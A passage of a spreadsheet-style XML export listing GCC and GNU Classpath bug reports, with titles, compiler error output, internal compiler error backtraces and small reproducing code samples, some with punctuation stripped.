ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacRijndaelImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:455: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacSerpentImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:455: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacSerpentImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:457: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacSquareImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:457: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacSquareImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:459: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacTripleDESImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:459: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacTripleDESImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:461: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacTwofishImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:461: er
ror: cannot find file for class gnu.javax.crypto.jce.mac.OMacTwofishImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:518: er
ror: cannot find file for class gnu.javax.crypto.RSACipherImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:518: er
ror: cannot find file for class gnu.javax.crypto.RSACipherImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:523: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.ARCFourRandomSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:523: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.ARCFourRandomSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:526: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.CSPRNGSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:526: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.CSPRNGSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:529: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.ICMRandomSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:529: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.ICMRandomSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:532: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.UMacRandomSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:532: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.UMacRandomSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:535: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.FortunaImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:535: er
ror: cannot find file for class gnu.javax.crypto.jce.prng.FortunaImpl
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:540: er
ror: cannot find file for class gnu.javax.crypto.jce.keyring.GnuKeyring
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:540: er
ror: cannot find file for class gnu.javax.crypto.jce.keyring.GnuKeyring
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:545: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHKeyPairGeneratorSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:545: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHKeyPairGeneratorSpi
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:553: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHKeyFactory
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:553: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHKeyFactory
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:559: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHParameters
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:559: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHParameters
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:565: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHParametersGenerator
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:565: er
ror: cannot find file for class gnu.javax.crypto.jce.sig.DHParametersGenerator
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java: In cla
ss 'gnu.javax.crypto.jce.GnuCrypto':
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java: In con
structor '()':
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:64: err
or: cannot find file for class java.security.AccessController
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:64: err
or: class 'java.security.AccessController' has no method named 'doPrivileged' ma
tching signature '(Ljava/security/PrivilegedAction)Ljava/lang/Object'
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java: In met
hod 'gnu.javax.crypto.jce.GnuCrypto.getCipherNames()':
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:582: er
ror: cannot find file for class java.util.HashSet
../../../../../gcc/libjava/classpath/gnu/javax/crypto/jce/GnuCrypto.java:582: in
ternal compiler error: vector VEC(treebase) index domain error in class_depth
at java/class.c:522</t>
  </si>
  <si>
    <t>GCC-57035</t>
  </si>
  <si>
    <t>TS29113's C535b: Wrongly accept DIMENSION(..) to TRANSFER</t>
  </si>
  <si>
    <t>From http://gcc.gnu.org/ml/fortran/2013-04/msg00203.html
The following code is wrongly accepted:
subroutine assumed_rank (a)
  integer intent(in) :: a(..)
  integer :: c(1:4)
  c = transfer(ac4)
end subroutine
From TS29113:
C535b An assumed-rank variable name shall not appear in a designator or expression except as an actual argument corresponding to a dummy argument that is assumed-rank the argument of the C_LOC function in the ISO_C_BINDING intrinsic module or the first argument in a reference to an intrinsic inquiry function.
There might be similar issues with TYPE(*) and !GCC$ attributes no_arg_check which are similar constraints.
Possibly the simplest would be to use intrinsic.c's do_check which could use both
  if (!specific-&gt;inquiry) 
    ...
and
  for (arg = arg-&gt;next arg arg = arg-&gt;next)
    if (arg-&gt;expr ... )
      ...</t>
  </si>
  <si>
    <t>CLASSPATH-23719</t>
  </si>
  <si>
    <t>Nested Class links wrong</t>
  </si>
  <si>
    <t>In the Nested Class Sumamry the links to the inner classes are wrong.
They point to # but should point to
.InnerClass.html
See for example:
http://developer.classpath.org/doc/java/util/Map.html
(The Map.Entry element.)</t>
  </si>
  <si>
    <t>GCC-46438</t>
  </si>
  <si>
    <t>xtensa-elf --enable-werror-always build fails</t>
  </si>
  <si>
    <t>../../../gcc/gcc/config/xtensa/xtensa.c: In function â€˜xtensa_expand_nonlocal_gotoâ€™:
../../../gcc/gcc/config/xtensa/xtensa.c:1310:8: error: enum conversion when passing argument 2 of â€˜emit_library_callâ€™ is invalid in C++ [-Werror=c++-compat]
../../../gcc/gcc/rtl.h:2480:13: note: expected â€˜enum libcall_typeâ€™ but argument is of type â€˜intâ€™
../../../gcc/gcc/config/xtensa/xtensa.c: In function â€˜xtensa_setup_frame_addressesâ€™:
../../../gcc/gcc/config/xtensa/xtensa.c:1586:6: error: enum conversion when passing argument 2 of â€˜emit_library_callâ€™ is invalid in C++ [-Werror=c++-compat]
../../../gcc/gcc/rtl.h:2480:13: note: expected â€˜enum libcall_typeâ€™ but argument is of type â€˜intâ€™
../../../gcc/gcc/config/xtensa/xtensa.c: In function â€˜xtensa_function_arg_1â€™:
../../../gcc/gcc/config/xtensa/xtensa.c:2053:13: error: assignment discards â€˜constâ€™ qualifier from pointer target type [-Werror]
../../../gcc/gcc/config/xtensa/xtensa.c: In function â€˜xtensa_expand_prologueâ€™:
../../../gcc/gcc/config/xtensa/xtensa.c:2640:3: error: enum conversion when passing argument 2 of â€˜gen_rtx_fmt_ee_statâ€™ is invalid in C++ [-Werror=c++-compat]
./genrtl.h:24:1: note: expected â€˜enum machine_modeâ€™ but argument is of type â€˜intâ€™
../../../gcc/gcc/config/xtensa/xtensa.c: In function â€˜xtensa_trampoline_initâ€™:
../../../gcc/gcc/config/xtensa/xtensa.c:3593:8: error: enum conversion when passing argument 2 of â€˜emit_library_callâ€™ is invalid in C++ [-Werror=c++-compat]
../../../gcc/gcc/rtl.h:2480:13: note: expected â€˜enum libcall_typeâ€™ but argument is of type â€˜intâ€™</t>
  </si>
  <si>
    <t>GCC-65167</t>
  </si>
  <si>
    <t>ICE: in assign_by_spills at lra-assigns.c:1383 (unable to find a register to spill) with -O -fschedule-insns -fcheck-pointer-bounds -mmpx</t>
  </si>
  <si>
    <t>Created attachment 34837
reduced testcase
Compiler output:
$ gcc -O -fschedule-insns -fcheck-pointer-bounds -mmpx testcase.c
testcase.c: In function 'foo.chkp':
testcase.c:7:1: error: unable to find a register to spill
 }
 ^
testcase.c:7:1: error: this is the insn:
(insn 21 49 32 2 (parallel [
            (unspec [
                    (mem:DI (unspec:DI [
                                (plus:DI (reg/f:DI 7 sp)
                                    (const_int -8 [0xfffffffffffffff8]))
                                (subreg:DI (reg/v/f:DI 94 [ e ]) 0)
                            ] UNSPEC_BNDLDX_ADDR) [0  S8 A8])
                    (reg:BND64 111 [orig:101 __chkp_bounds_of_e ] [101])
                ] UNSPEC_BNDSTX)
            (set (mem/v:BLK (plus:DI (reg/f:DI 7 sp)
                        (const_int -8 [0xfffffffffffffff8])) [0  A8])
                (unspec:BLK [
                        (mem/v:BLK (plus:DI (reg/f:DI 7 sp)
                                (const_int -8 [0xfffffffffffffff8])) [0  A8])
                    ] UNSPEC_MPX_FENCE))
        ]) testcase.c:5 1067 {*bnd64_stx}
     (expr_list:REG_DEAD (reg:BND64 111 [orig:101 __chkp_bounds_of_e ] [101])
        (expr_list:REG_DEAD (reg/v/f:DI 94 [ e ])
            (nil))))
testcase.c:7:1: internal compiler error: in assign_by_spills at lra-assigns.c:1383
0xbcd308 _fatal_insn(char const* rtx_def const* char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/rtl-error.c:110
0xac5ef6 assign_by_spills
        /mnt/svn/gcc-trunk/gcc/lra-assigns.c:1383
0xac6723 lra_assign()
        /mnt/svn/gcc-trunk/gcc/lra-assigns.c:1558
0xac2042 lra(_IO_FILE*)
        /mnt/svn/gcc-trunk/gcc/lra.c:2337
0xa705e1 do_reload
        /mnt/svn/gcc-trunk/gcc/ira.c:5418
0xa705e1 execute
        /mnt/svn/gcc-trunk/gcc/ira.c:5589
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r220888 - fail</t>
  </si>
  <si>
    <t>GCC-54108</t>
  </si>
  <si>
    <t>35% bigger binary</t>
  </si>
  <si>
    <t>http://sourceforge.net/projects/qemplayer/files/source%20code/qemplayer-12.6.tar.xz/download
with -flto 478896 bytes
without -flto 354896 bytes
compiler flags can be changed in file SConstruct</t>
  </si>
  <si>
    <t>GCC-262</t>
  </si>
  <si>
    <t>c++ template bug</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Mon 29 May 2000 19:58:03 +0100 (BST)
 Original-Message-ID: 
 Hi
 I've found an internal compiler error with gcc-2.95.2 19991024 on a RedHat
 Linux machine with glibc-2.1. The message is as follows:
 xpc6:~/classes/FITS&gt; g++ -Wall -g -c generate_instances.cc
 generate_instances.cc:12: Internal compiler error.
 generate_instances.cc:12: Please submit a full bug report.
 generate_instances.cc:12: See
  for instructions.
 Hope you can fix this!
 Jeremy
Release:
2.95.2
How-To-Repeat:
See attachments for generate_instances.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-17113</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE with SSE2 intrinsics</t>
  </si>
  <si>
    <t>When I compile the following source file using:
$ gcc -march=pentium4 -O2 gccbug-p.cpp
The program breaks with the output seen below. However if I compile it like:
$ gcc -march=pentium4 -O2 -fno-gcse gccbug-p.cpp
Everything is fine.
Output with -march=pentium4 -O2
-------------------------------
Reading specs from /opt/gcc-3.4/lib/gcc/i686-pc-linux-gnu/3.4.1/specs
Configured with: ./configure --prefix=/opt/gcc-3.4
Thread model: posix
gcc version 3.4.1
 /opt/gcc-3.4/libexec/gcc/i686-pc-linux-gnu/3.4.1/cc1plus -quiet -v
-D_GNU_SOURCE gccbug-p.cpp -quiet -dumpbase gccbug-p.cpp -march=pentium4
-auxbase gccbug-p -O2 -version -o /tmp/cc69Idn4.s
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory
/opt/gcc-3.4/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /opt/gcc-3.4/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../include/c++/3.4.1
 /opt/gcc-3.4/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../include/c++/3.4.1/i686-pc-linux-gnu
 /opt/gcc-3.4/lib/gcc/i686-pc-linux-gnu/3.4.1/../../../../include/c++/3.4.1/backward
 /opt/gcc-3.4/include
 /opt/gcc-3.4/lib/gcc/i686-pc-linux-gnu/3.4.1/include
 /usr/include
End of search list.
GNU C++ version 3.4.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.4.2 20040819 (prerelease).
GGC heuristics: --param ggc-min-expand=99 --param ggc-min-heapsize=129450
gccbug-p.cpp: In function `void test1(int*)':
gccbug-p.cpp:70: error: unrecognizable insn:
(insn:HI 240 4 241 0 (set (reg:V16QI 79 [ __B ])
        (const_vector:V16QI [
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
            ])) -1 (nil)
    (expr_list:REG_EQUAL (const_vector:V16QI [
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
                (const_int 0 [0x0])
            ])
        (nil)))
gccbug-p.cpp:70: internal compiler error: in extract_insn at recog.c:2083
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>bobm75</t>
  </si>
  <si>
    <t>GCC-8942</t>
  </si>
  <si>
    <t>internal compiler error: in ggc_set_mark at ggc-page.c:981</t>
  </si>
  <si>
    <t>c++ -DHAVE_CVS_IDENT=1 -DHAVE_CONFIG_H -g -O2 -save-temps -I. -I. -MD -c dup_expr.cc -o dup_expr.o
In file included from dup_expr.cc:25:
netlist.h:312: internal compiler error: in ggc_set_mark at ggc-page.c:981
Please submit a full bug report
Please let me know if you need more info.
BTW I didn't put the source since it references too many
includes though the .ii should have enough info.
Art
Release:
3.2-7 (Linux RedHat 8.0)
Environment:
Linux 2.4.18-3
gcc version 3.3 20021114 (experimental)
How-To-Repeat:
Just try to compile above code.</t>
  </si>
  <si>
    <t>pinaart</t>
  </si>
  <si>
    <t>GCC-1069</t>
  </si>
  <si>
    <t>Internal compiler error in gcc-20001211</t>
  </si>
  <si>
    <t xml:space="preserve">	gcc breaks on the compilation of linux kernel code (2.4.0test12) with an 
	ICE. This bug was not present on earlier gcc snapshots (e.g. 20000925)
	eith kernel 2.4.0test10.  The failing struct initialisation differs from
	2.4.0pre10 in that there is in pre12 one component (char[]) less to 
	initialize.
gcc -D__KERNEL__ -I/usr/src/linux-2.4.0-test12-work/include -Wall -Wstrict-prototypes -O2 -fomit-frame-pointer -fno-strict-aliasing -pipe -mno-fp-regs -ffixed-8 -mcpu=ev4 -Wa-mev6    -DEXPORT_SYMTAB -c ip_tables.c
ip_tables.c: In function `ipt_register_table':
ip_tables.c:1361: Internal compiler error in array_size_for_constructor at varasm.c:4456
Please submit a full bug report.
See  for instructions.
make[3]: *** [ip_tables.o] Error 1
make[3]: Leaving directory `/usr/src/linux-2.4.0-test12-work/net/ipv4/netfilter'
make[2]: *** [first_rule] Error 2
make[2]: Leaving directory `/usr/src/linux-2.4.0-test12-work/net/ipv4/netfilter'
make[1]: *** [_subdir_ipv4/netfilter] Error 2
make[1]: Leaving directory `/usr/src/linux-2.4.0-test12-work/net'
make: *** [_dir_net] Error 2
Release:
2.97 20001211 (experimental)
Environment:
System: Linux Marvin 2.4.0-test10 #1 Fri Oct 20 00:31:02 UTC 2000 alpha unknown
Architecture: alpha
	Alpha AXPpci33 ev4
	glibc-2.1.3
host: alpha-unknown-linux-gnu
build: alpha-unknown-linux-gnu
target: alpha-unknown-linux-gnu
configured with: ../gcc-20001211/configure --enable-threads --enable-shared --prefix=/usr --enable-languages=cc++
How-To-Repeat:
	issue gcc command line as follows:
Marvin:/usr/src/linux-2.4.0-test12-work/net/ipv4/netfilter$ gcc -v -save-temps -D__KERNEL__ -I/usr/src/linux-2.4.0-test12-work/include -Wall -Wstrict-prototypes -O2 -fomit-frame-pointer -fno-strict-aliasing -pipe -mno-fp-regs -ffixed-8 -mcpu=ev4 -Wa-mev6    -DEXPORT_SYMTAB -c ip_tables.c
gcc: Warning: -pipe ignored because -save-temps specified
Reading specs from /usr/lib/gcc-lib/alpha-unknown-linux-gnu/2.97/specs
Configured with: ../gcc-20001211/configure --enable-threads --enable-shared --prefix=/usr --enable-languages=cc++
gcc version 2.97 20001211 (experimental)
 /usr/lib/gcc-lib/alpha-unknown-linux-gnu/2.97/cpp0 -lang-c -v -I/usr/src/linux-2.4.0-test12-work/include
-D__GNUC__=2 -D__GNUC_MINOR__=97 -D__GNUC_PATCHLEVEL__=0 -Dlinux -Dunix -D_LONGLONG -D__alpha__ -D__ELF__
-D__linux__ -D__unix__ -D_LONGLONG -D__alpha__ -D__ELF__ -D__linux -D__unix -Asystem=linux -D__OPTIMIZE__
-D__STDC_HOSTED__=1 -Wall -Wstrict-prototypes -D__LANGUAGE_C__ -D__LANGUAGE_C -DLANGUAGE_C -Acpu=alpha -Amachine=alpha -D__alpha -D__alpha__ -D__alpha_ev4__ -Acpu=ev4 -D__KERNEL__ -DEXPORT_SYMTAB ip_tables.c ip_tables.i
GNU CPP version 2.97 20001211 (experimental) (cpplib) (Alpha GNU/Linux for ELF)
#include ... search starts here:
#include  search starts here:
 /usr/src/linux-2.4.0-test12-work/include
 /usr/local/include
 /usr/lib/gcc-lib/alpha-unknown-linux-gnu/2.97/include
 /usr/alpha-unknown-linux-gnu/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/alpha-unknown-linux-gnu/2.97/cc1 -fpreprocessed ip_tables.i -quiet -dumpbase ip_tables.c -mno-fp-regs -mcpu=ev4 -O2 -Wall -Wstrict-prototypes -version -fomit-frame-pointer -fno-strict-aliasing -ffixed-8 -o ip_tables.s
GNU C version 2.97 20001211 (experimental) (alpha-unknown-linux-gnu) compiled by GNU C version 2.97 20001211 (experimental).
ip_tables.c: In function `ipt_register_table':
ip_tables.c:1361: Internal compiler error in array_size_for_constructor at varasm.c:4456
Please submit a full bug report.
See  for instructions.
See attachments for ip_tables.i.gz
</t>
  </si>
  <si>
    <t>dl8bcu</t>
  </si>
  <si>
    <t>GCC-68570</t>
  </si>
  <si>
    <t>[6 Regression] ICE on valid code at -O1 -O2 and -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O1 -O2 and -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It is a regression from 5.2.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151125 (experimental) [trunk revision 230867] (GCC)
$
$ gcc-trunk -O0 -c small.c
$ gcc-5.2 -O1 -c small.c
$
$ gcc-trunk -O1 -c small.c
small.c: In function â€˜fn1â€™:
small.c:4:1: internal compiler error: Segmentation fault
 fn1 ()
 ^~~
0xaf378f crash_signal
        ../../gcc-trunk/gcc/toplev.c:334
0xe4db44 gimple_truth_valued_p(tree_node* tree_node* (*)(tree_node*))
        /tmp/objdir/gcc/gimple-match.c:162
0xec0d99 gimple_simplify_NE_EXPR
        /tmp/objdir/gcc/gimple-match.c:47863
0xe53881 gimple_simplify
        /tmp/objdir/gcc/gimple-match.c:52160
0xe5610d gimple_resimplify2(gimple** code_helper* tree_node* tree_node** tree_node* (*)(tree_node*))
        ../../gcc-trunk/gcc/gimple-match-head.c:159
0xebebf0 gimple_simplify(gimple* code_helper* tree_node** gimple** tree_node* (*)(tree_node*) tree_node* (*)(tree_node*))
        ../../gcc-trunk/gcc/gimple-match-head.c:748
0xb3b20f cleanup_control_expr_graph
        ../../gcc-trunk/gcc/tree-cfgcleanup.c:101
0xb3b20f cleanup_control_flow_bb
        ../../gcc-trunk/gcc/tree-cfgcleanup.c:200
0xb3b20f cleanup_tree_cfg_bb
        ../../gcc-trunk/gcc/tree-cfgcleanup.c:617
0xb3b878 cleanup_tree_cfg_1
        ../../gcc-trunk/gcc/tree-cfgcleanup.c:670
0xb3b878 cleanup_tree_cfg_noloop
        ../../gcc-trunk/gcc/tree-cfgcleanup.c:720
0xb3b878 cleanup_tree_cfg()
        ../../gcc-trunk/gcc/tree-cfgcleanup.c:771
0xa27ce4 execute_function_todo
        ../../gcc-trunk/gcc/passes.c:1911
0xa2873b execute_todo
        ../../gcc-trunk/gcc/passes.c:2010
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
----------------------------------
int a d e f h i k
void
fn1 ()
{ 
  char m
  for ()
    { 
      for ()
        { 
          e = f = 1
          if (i)
            d = h = 0
          else
            a = 0
          break
        }
      k = 0
      if (f)
        a = 3
      if (d)
        f = 0
      if (a &gt; (i &lt; 1))
        { 
          if (e)
            break
        }
      else
        i = m
      k = i ? a : i
    }
}</t>
  </si>
  <si>
    <t>GCC-12065</t>
  </si>
  <si>
    <t>Strange fpos arithmetic.</t>
  </si>
  <si>
    <t>fpos::operator+ and fpos::operator- are not declared const. Furthermore there
is no operator- taking two arguments of type fpos. This combined with
fpos::operator streamoff() causes some really weird behaviour.</t>
  </si>
  <si>
    <t>GCC-15101</t>
  </si>
  <si>
    <t>Trying to use double precision SIMD vector causes: internal compiler error: in extract_bit_field at expmed.c:1152</t>
  </si>
  <si>
    <t>The documentation claims that gcc can write out double precision floating point
arithmetic if the hardware can't do it SIMD. 
When compiling with -O3 this results in the ICE above when compiling without
-O it produces bogus results.
Compiled with:
gcc -Wall -ggdb -march=pentium3 -msse simd.c -o simd -O3
Code:
typedef int v4df __attribute__ ((mode(V4DF)))
typedef int v4sf __attribute__ ((mode(V4SF)))
union dvector4
{
  v4df vect
  double e[4]
}
union fvector4
{
  v4sf vect
  float e[4]
}
int main()
{
  int n
  union dvector4 a b
  a.e[0]=0
  a.e[1]=10
  a.e[2]=20
  a.e[3]=30
  b.e[0]=0
  b.e[1]=0
  b.e[2]=0
  b.e[3]=0
  for(n=0n&lt;1000++n) {
    b.vect = b.vect + a.vect
    /*
    b.e[0] = b.e[0] + a.e[0]
    b.e[1] = b.e[1] + a.e[1]
    b.e[2] = b.e[2] + a.e[2]
    b.e[3] = b.e[3] + a.e[3]
    */
  }
  //  printf(%f %f %f %f\n c.e[0] c.e[1] c.e[2] c.e[3])
  return 0
}</t>
  </si>
  <si>
    <t>ahu</t>
  </si>
  <si>
    <t>GCC-2632</t>
  </si>
  <si>
    <t>Internal compiler error in `make_decl_rtl' at varasm.c:</t>
  </si>
  <si>
    <t>while building code *which is far from debugged* g++ 
generates this error:
Internal compiler error in `make_decl_rtl' at varasm.c:
Please submit a full bug report.
Release:
gcc version 2.95.2 20000220 (Debian GNU/Linux)
Environment:
Linux kernel 2.4.2 running on a Dual-PIII
How-To-Repeat:
unzip and tar main.tar.bz2 and type make</t>
  </si>
  <si>
    <t>frussell</t>
  </si>
  <si>
    <t>GCC-49173</t>
  </si>
  <si>
    <t>[4.7 Regression] No rule to make target `../../../../work/libgcc/../gcc/libgcc-std.ver' needed by `libgcc.map'.</t>
  </si>
  <si>
    <t>At revision 174286 bootstrap fails with
...
# Recursively invoke make in the GCC directory to build any
make[5]: *** No rule to make target `../../../../work/libgcc/../gcc/libgcc-std.ver' needed by `libgcc.map'.  Stop.
make[5]: *** Waiting for unfinished jobs....
...
libgcc-std.ver has been deleted at revision 174284.</t>
  </si>
  <si>
    <t>GCC-15737</t>
  </si>
  <si>
    <t>[4.0 Regression] :1: internal compiler error: in ten_to_ptwo at real.c:2012</t>
  </si>
  <si>
    <t>In stage2:
./xgcc -B./ -B/home/dave/opt/gnu/gcc/gcc-3.5.0/hppa-linux/bin/ -isystem /home/da
ve/opt/gnu/gcc/gcc-3.5.0/hppa-linux/include -isystem /home/dave/opt/gnu/gcc/gcc-
3.5.0/hppa-linux/sys-include -L/home/dave/gnu/gcc-3.5/objdir/gcc/../ld -O2 -DIN_
GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-s
tyle-definition  -isystem ./include  -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -
I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I../../gcc/gcc/../l
ibbanshee/libcompat -I../../gcc/gcc/../libbanshee -I../../gcc/gcc/../libbanshee/
points-to   -g0 -finhibit-size-directive -fno-inline-functions -fno-exceptions -
fno-zero-initialized-in-bss -fno-unit-at-a-time  \
   -c ../../gcc/gcc/crtstuff.c -DCRT_BEGIN \
  -o crtbegin.o
:1: internal compiler error: in ten_to_ptwo at real.c:2012</t>
  </si>
  <si>
    <t>GCC-44955</t>
  </si>
  <si>
    <t>over-prefetched for arrays of complex number</t>
  </si>
  <si>
    <t>While I am working on prefetching-incurred performance degradation on 168.wupwise I find that complex arrays are always over-prefetched. 
Prefetches are generated for both the real part and imagine part.
     subroutine s311 (ijnmbetaab)
c
c     reductions
c     sum reduction
c
      integer n i j beta m
      complex a(nn) b(nn)
      do 1 j = 1n
      do 10 i = 1m
         a(ij) = a(ij) + beta * b(ij)
  10  continue
  1   continue
      return
      end
For this example two prefetches are generated for a and two prefetches for
b.</t>
  </si>
  <si>
    <t>GCC-12711</t>
  </si>
  <si>
    <t>__bb_exit_func() arc profiling errors</t>
  </si>
  <si>
    <t>The immediate bug I'm encountering is that __bb_exit_func() will print
arc profiling: failed to open output file (null) over and over.
I'm attaching a program that when built with -fprofile-arcs -ftest-coverage 
will show this behavior.
This is because of the code:
       if (error || !merging)
	ptr-&gt;filename = 0
The !merging case sets filename to 0 then on subsequent iterations the code
doesn't check ptr-&gt;filename != 0 and passes the null pointer to fopen()
resulting in EFAULT.
However other possible issues:
 1. I don't understand why further writes to the .da file are disabled 
    if !merging. If someone could explain this I could maybe find a 
    better fix for the problem than only adding an if (!ptr-&gt;filename)
    check.
 2. It seems to me that the fcntl() locking is broken if the lock is held 
    fcntl() will fail and return EACCES or EAGAIN and in that case the 
    code just continues on to write to the file as far as I can tell.
    I have a patch that will repeatedly sleep and retry the lock if 
    the lock fails.
 3. None of the error messages print strerror I have a patch for this also.
In any case some guidance on the correct fix for the !merging case and what I
am missing about the file locking issue would be welcome.</t>
  </si>
  <si>
    <t>GCC-7804</t>
  </si>
  <si>
    <t>bad printing of fp constant in warning message</t>
  </si>
  <si>
    <t>z.cc:5: warning: division by zero in `
   0x00000000000000000080ff3f0000000000000000 / 0.'
z.cc:6: warning: division by zero in `
   0000000000000000000000000000000000000000 / 0.'
Release:
3.2 and 3.3
Environment:
i686-linux
How-To-Repeat:
        extern C int printf(const char * ...)
        struct S
        {
          static const float inf = 1.0f / 0.0f
          static const float nan = 0.0f / 0.0f
        }
        int main()
        {
          printf(%f\n%f\n S::inf S::nan)
          return 0
        }</t>
  </si>
  <si>
    <t>GCC-8475</t>
  </si>
  <si>
    <t>hash_map  error message at run time about __default_alloc_template/force_new not defined</t>
  </si>
  <si>
    <t>#include 
using namespace __gnu_cxx
template class hash_map
int main() { }
&gt; g++ -O3 test_hash.cpp -o test_hash
&gt; ./test_hash
./test_hash: relocation error: ./test_hash: symbol _ZNSt24__default_alloc_templateILb1ELi0EE12_S_force_newE version GLIBCPP_3.2 not defined in file libstdc++.so.5 with link time reference
Release:
gcc (GCC) 3.3 20021029
Environment:
linux P4</t>
  </si>
  <si>
    <t>GCC-32915</t>
  </si>
  <si>
    <t>ICE while compiling libgfortran/io/write.c</t>
  </si>
  <si>
